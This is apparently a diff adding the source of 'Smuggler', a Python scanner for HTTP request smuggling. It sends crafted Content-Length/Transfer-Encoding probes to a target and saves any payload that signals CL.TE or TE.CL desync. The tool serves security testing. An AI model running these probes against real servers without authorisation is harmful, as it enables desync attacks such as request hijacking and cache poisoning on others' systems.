WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +import argparse +import re +import time +import sys +import os +import random +import string +import importlib +import hashlib +from copy import deepcopy +from time import sleep +from datetime import datetime +from lib.Payload import Payload, Chunked, EndChunk +from lib.EasySSL import EasySSL +from lib.colorama import Fore, Style + +class Desyncr(): + def __init__(self, configfile, smhost, smport=443, url="", method="GET", endpoint="/", SSLFlag=False, logh=None, smargs=None): + self._configfile = configfile + self._host = smhost + self._port = smport + self._method = method + self._endpoint = endpoint + self._vhost = smargs.vhost + self._url = url + self._timeout = float(smargs.timeout) + self.ssl_flag = SSLFlag + self._logh = logh + self._quiet = smargs.quiet + self._exit_early = smargs.exit_early + self._attempts = 0 + self._cookies = [] + + def _test(self, payload_obj): + try: + web = EasySSL(self.ssl_flag) + web.connect(self._host, self._port, self._timeout) + web.send(str(payload_obj).encode()) + #print(payload_obj) + start_time = datetime.now() + res = web.recv_nb(self._timeout) + end_time = datetime.now() + web.close() + if res is None: + delta_time = end_time - start_time + if delta_time.seconds < (self._timeout-1): + return (2, res, payload_obj) # Return code 2 if disconnected before timeout + return (1, res, payload_obj) # Return code 1 if connection timedout + # Filter out problematic characters + res_filtered = "" + for single in res: + if single > 0x7F: + res_filtered += '\x30' + else: + res_filtered += chr(single) + res = res_filtered + #if '504' in res: + + #print("\n\n"+str(str(payload_obj))) + #print("\n\n"+res) + return (0, res, payload_obj) # Return code 0 if normal response returned + except Exception as exception_data: + #print(exception_data) + return (-1, None, payload_obj) # Return code -1 if some except occured + + def _get_cookies(self): + RN = "\r\n" + try: + cookies = [] + web = EasySSL(self.ssl_flag) + web.connect(self._host, self._port, 2.0) + p = Payload() + p.host = self._host + p.method = "GET" + p.endpoint = self._endpoint + p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN + p.header += "Host: __HOST__" + RN + p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN + p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN + p.header += "Content-Length: 0" + RN + p.body = "" + #print (str(p)) + web.send(str(p).encode()) + sleep(0.5) + res = web.recv_nb(2.0) + web.close() + if (res is not None): + res = res.decode().split("\r\n") + for elem in res: + if len(elem) > 11: + if elem[0:11].lower().replace(" ", "") == "set-cookie:": + cookie = elem.lower().replace("set-cookie:","") + cookie = cookie.split(";")[0] + ';' + cookies += [cookie] + info = ((Fore.CYAN + str(len(cookies))+ Fore.MAGENTA), self._logh) + print_info("Cookies : %s (Appending to the attack)" % (info[0])) + self._cookies += cookies + return True + except Exception as exception_data: + error = ((Fore.CYAN + "Unable to connect to host"+ Fore.MAGENTA), self._logh) + print_info("Error : %s" % (error[0])) + return False + + def run(self): + RN = "\r\n" + mutations = {} + + if not self._get_cookies(): + return + + if (self._configfile[1] != '/'): + self._configfile = os.path.dirname(os.path.abspath(__file__)) + "/configs/" + self._configfile + + try: + f = open(self._configfile) + except: + error = ((Fore.CYAN + "Cannot find config file"+ Fore.MAGENTA), self._logh) + print_info("Error : %s" % (error[0])) + exit(1) + + script = f.read() + f.close() + + exec(script) + + for mutation_name in mutations.keys(): + if self._create_exec_test(mutation_name, mutations[mutation_name]) and self._exit_early: + break + + if self._quiet: + sys.stdout.write("\r"+" "*100+"\r") + + # ptype == 0 (Attack payload, timeout could mean potential TECL desync) + # ptype == 1 (Edgecase payload, expected to work) + def _check_tecl(self, payload, ptype=0): + te_payload = deepcopy(payload) + if (self._vhost == ""): + te_payload.host = self._host + else: + te_payload.host = self._vhost + te_payload.method = self._method + te_payload.endpoint = self._endpoint + + if len(self._cookies) > 0: + te_payload.header += "Cookie: " + ''.join(self._cookies) + "\r\n" + + if not ptype: + te_payload.cl = 6 # timeout val == 6, good value == 5 + else: + te_payload.cl = 5 # timeout val == 6, good value == 5 + te_payload.body = EndChunk+"X" + #print (te_payload) + return self._test(te_payload) + + # ptype == 0 (timeout payload, timeout could mean potential CLTE desync) + # ptype == 1 (Edgecase payload, expected to work) + def _check_clte(self, payload, ptype=0): + te_payload = deepcopy(payload) + if (self._vhost == ""): + te_payload.host = self._host + else: + te_payload.host = self._vhost + te_payload.method = self._method + te_payload.endpoint = self._endpoint + + if len(self._cookies) > 0: + te_payload.header += "Cookie: " + ''.join(self._cookies) + "\r\n" + + if not ptype: + te_payload.cl = 4 # timeout val == 4, good value == 11 + else: + te_payload.cl = 11 # timeout val == 4, good value == 11 + te_payload.body = Chunked("Z")+EndChunk + #print (te_payload) + return self._test(te_payload) + + + def _create_exec_test(self, name, te_payload): + def pretty_print(name, dismsg): + spacing = 13 + sys.stdout.write("\r"+" "*100+"\r") + msg = Style.BRIGHT + Fore.MAGENTA + "[%s]%s: %s" % \ + (Fore.CYAN + name + Fore.MAGENTA, " "*(spacing-len(name)), dismsg) + sys.stdout.write(CF(msg)) + sys.stdout.flush() + + if dismsg[-1] == "\n": + ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]') + plaintext = ansi_escape.sub('', msg) + if self._logh is not None: + self._logh.write(plaintext) + self._logh.flush() + + + def write_payload(smhost, payload, ptype): + furl = smhost.replace('.', '_') + if (self.ssl_flag): + furl = "https_" + furl + else: + furl = "http_" + furl + if os.path.islink(sys.argv[0]): + _me = os.readlink(sys.argv[0]) + else: + _me = sys.argv[0] + fname = os.path.abspath(os.path.dirname(_me)) + "/payloads/%s_%s_%s.txt" % (furl,ptype,name) + pretty_print("CRITICAL", "%s Payload: %s URL: %s\n" % \ + (Fore.MAGENTA+ptype, Fore.CYAN+fname+Fore.MAGENTA, Fore.CYAN+self._url)) + with open(fname, 'wb') as file: + file.write(bytes(str(payload),'utf-8')) + + # First lets test TECL + pretty_print(name, "Checking TECL...") + start_time = time.time() + tecl_res = self._check_tecl(te_payload, 0) + tecl_time = time.time()-start_time + + # Next lets test CLTE + pretty_print(name, "Checking CLTE...") + start_time = time.time() + clte_res = self._check_clte(te_payload, 0) + clte_time = time.time()-start_time + + if (clte_res[0] == 1): + # Potential CLTE found + # Lets check the edge case to be sure + clte_res2 = self._check_clte(te_payload, 1) + if clte_res2[0] == 0: + self._attempts += 1 + if (self._attempts < 3): + return self._create_exec_test(name, te_payload) + else: + dismsg = Fore.RED + "Potential CLTE Issue Found" + Fore.MAGENTA + " - " + Fore.CYAN + self._method + Fore.MAGENTA + " @ " + Fore.CYAN + ["http://","https://",][self.ssl_flag]+ self._host + self._endpoint + Fore.MAGENTA + " - " + Fore.CYAN + self._configfile.split('/')[-1] + "\n" + pretty_print(name, dismsg) + + # Write payload out to file + write_payload(self._host, clte_res[2], "CLTE") + self._attempts = 0 + return True + + else: + # No edge behavior found + dismsg = Fore.YELLOW + "CLTE TIMEOUT ON BOTH LENGTH 4 AND 11" + ["\n", ""][self._quiet] + pretty_print(name, dismsg) + + elif (tecl_res[0] == 1): + # Potential TECL found + # Lets check the edge case to be sure + tecl_res2 = self._check_tecl(te_payload, 1) + if tecl_res2[0] == 0: + self._attempts += 1 + if (self._attempts < 3): + return self._create_exec_test(name, te_payload) + else: + #print (str(tecl_res2[2])) + #print (tecl_res2[1]) + dismsg = Fore.RED + "Potential TECL Issue Found" + Fore.MAGENTA + " - " + Fore.CYAN + self._method + Fore.MAGENTA + " @ " + Fore.CYAN + ["http://","https://",][self.ssl_flag]+ self._host + self._endpoint + Fore.MAGENTA + " - " + Fore.CYAN + self._configfile.split('/')[-1] + "\n" + pretty_print(name, dismsg) + + # Write payload out to file + write_payload(self._host, tecl_res[2], "TECL") + self._attempts = 0 + return True + else: + # No edge behavior found + dismsg = Fore.YELLOW + "TECL TIMEOUT ON BOTH LENGTH 6 AND 5" + ["\n", ""][self._quiet] + pretty_print(name, dismsg) + + + #elif ((tecl_res[0] == 1) and (clte_res[0] == 1)): + # # Both types of payloads not supported + # dismsg = Fore.YELLOW + "NOT SUPPORTED" + ["\n", ""][self._quiet] + # pretty_print(name, dismsg) + elif ((tecl_res[0] == -1) or (clte_res[0] == -1)): + # ERROR + dismsg = Fore.YELLOW + "SOCKET ERROR" + ["\n", ""][self._quiet] + pretty_print(name, dismsg) + + elif ((tecl_res[0] == 0) and (clte_res[0] == 0)): + # No Desync Found + tecl_msg = (Fore.MAGENTA + " (TECL: " + Fore.CYAN +"%.2f" + Fore.MAGENTA + " - " + \ + Fore.CYAN +"%s" + Fore.MAGENTA + ")") % (tecl_time, tecl_res[1][9:9+3]) + + clte_msg = (Fore.MAGENTA + " (CLTE: " + Fore.CYAN +"%.2f" + Fore.MAGENTA + " - " + \ + Fore.CYAN +"%s" + Fore.MAGENTA + ")") % (clte_time, clte_res[1][9:9+3]) + + dismsg = Fore.GREEN + "OK" + tecl_msg + clte_msg + ["\n", ""][self._quiet] + pretty_print(name, dismsg) + + elif ((tecl_res[0] == 2) or (clte_res[0] == 2)): + # Disconnected + dismsg = Fore.YELLOW + "DISCONNECTED" + ["\n", ""][self._quiet] + pretty_print(name, dismsg) + + self._attempts = 0 + return False + +def process_uri(uri): + #remove shouldering white spaces and go lowercase + uri = uri.strip().lower() + + #if it starts with https:// then strip it + if ((len(uri) > 8) and (uri[0:8] == "https://")): + uri = uri[8:] + ssl_flag = True + std_port = 443 + elif ((len(uri) > 7) and (uri[0:7] == "http://")): + uri = uri[7:] + ssl_flag = False + std_port = 80 + else: + print_info("Error malformed URL not supported: %s" % (Fore.CYAN + uri)) + exit(1) + + #check for any forward slashes and filter only domain portion + uri_tokenized = uri.split("/") + uri = uri_tokenized[0] + smendpoint = '/' + '/'.join(uri_tokenized[1:]) + + #check for any port designators + uri = uri.split(":") + + if len(uri) > 1: + return (uri[0], int(uri[1]), smendpoint, ssl_flag) + + return (uri[0], std_port, smendpoint, ssl_flag) + +def CF(text): + global NOCOLOR + if NOCOLOR: + ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]') + text = ansi_escape.sub('', text) + return text + +def banner(sm_version): + print(CF(Fore.CYAN)) + print(CF(r" ______ _ ")) + print(CF(r" / _____) | | ")) + print(CF(r"( (____ ____ _ _ ____ ____| | _____ ____ ")) + print(CF(r" \____ \| \| | | |/ _ |/ _ | || ___ |/ ___)")) + print(CF(r" _____) ) | | | |_| ( (_| ( (_| | || ____| | ")) + print(CF(r"(______/|_|_|_|____/ \___ |\___ |\_)_____)_| ")) + print(CF(r" (_____(_____| ")) + print(CF(r"")) + print(CF(r" @defparam %s"%(sm_version))) + print(CF(Style.RESET_ALL)) + +def print_info(msg, file_handle=None): + ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]') + msg = Style.BRIGHT + Fore.MAGENTA + "[%s] %s"%(Fore.CYAN+'+'+Fore.MAGENTA, msg) + Style.RESET_ALL + plaintext = ansi_escape.sub('', msg) + print(CF(msg)) + if file_handle is not None: + file_handle.write(plaintext+"\n") + +if __name__ == "__main__": + global NOCOLOR + if sys.version_info < (3, 0): + print("Error: Smuggler requires Python 3.x") + sys.exit(1) + + Parser = argparse.ArgumentParser() + Parser.add_argument('-u', '--url', help="Target URL with Endpoint") + Parser.add_argument('-c', action="store_true",help="") + Parser.add_argument('-v', '--vhost', default="", help="Specify a virtual host") + Parser.add_argument('-x', '--exit_early', action='store_true',help="Exit scan on first finding") + Parser.add_argument('-m', '--method', default="GET", help="HTTP method to use (e.g GET, POST) Default: GET") + Parser.add_argument('-l', '--log', help="Specify a log file") + Parser.add_argument('-q', '--quiet', action='store_true', help="Quiet mode will only log issues found") + Parser.add_argument('-t', '--timeout', default=5.0, help="Socket timeout value Default: 5") + Parser.add_argument('--no-color', action='store_true', help="Suppress color codes") + Parser.add_argument('--configfile', default="default.py", help="Filepath to the configuration file of payloads") + Args = Parser.parse_args() # returns data from the options specified (echo) + + NOCOLOR = Args.no_color + if os.name == 'nt': + NOCOLOR = True + + Version = "v1.1" + banner(Version) + + if sys.version_info < (3, 0): + print_info("Error: Smuggler requires Python 3.x") + sys.exit(1) + + # If the URL argument is not specified then check stdin + if Args.url is None: + if sys.stdin.isatty(): + print_info("Error: no direct URL or piped URL specified\n") + Parser.print_help() + exit(1) + Servers = sys.stdin.read().split("\n") + else: + Servers = [Args.url + " " + Args.method] + + FileHandle = None + if Args.log is not None: + try: + FileHandle = open(Args.log, "w") + except: + print_info("Error: Issue with log file destination") + print(Parser.print_help()) + sys.exit(1) + + for server in Servers: + # If the next on the list is blank, continue + if server == "": + continue + # Tokenize + server = server.split(" ") + + # This is for the stdin case, if no method was specified default to GET + if len(server) == 1: + server += [Args.method] + + # If a protocol is not specified then default to https + if server[0].lower().strip()[0:4] != "http": + server[0] = "https://" + server[0] + + params = process_uri(server[0]) + method = server[1].upper() + host = params[0] + port = params[1] + endpoint = params[2] + SSLFlagval = params[3] + configfile = Args.configfile + + print_info("URL : %s"%(Fore.CYAN + server[0]), FileHandle) + print_info("Method : %s"%(Fore.CYAN + method), FileHandle) + print_info("Endpoint : %s"%(Fore.CYAN + endpoint), FileHandle) + print_info("Configfile : %s"%(Fore.CYAN + configfile), FileHandle) + print_info("Timeout : %s"%(Fore.CYAN + str(float(Args.timeout)) + Fore.MAGENTA + " seconds"), FileHandle) + + sm = Desyncr(configfile, host, port, url=server[0], method=method, endpoint=endpoint, SSLFlag=SSLFlagval, logh=FileHandle, smargs=Args) + sm.run() + + + if FileHandle is not None: + FileHandle.close()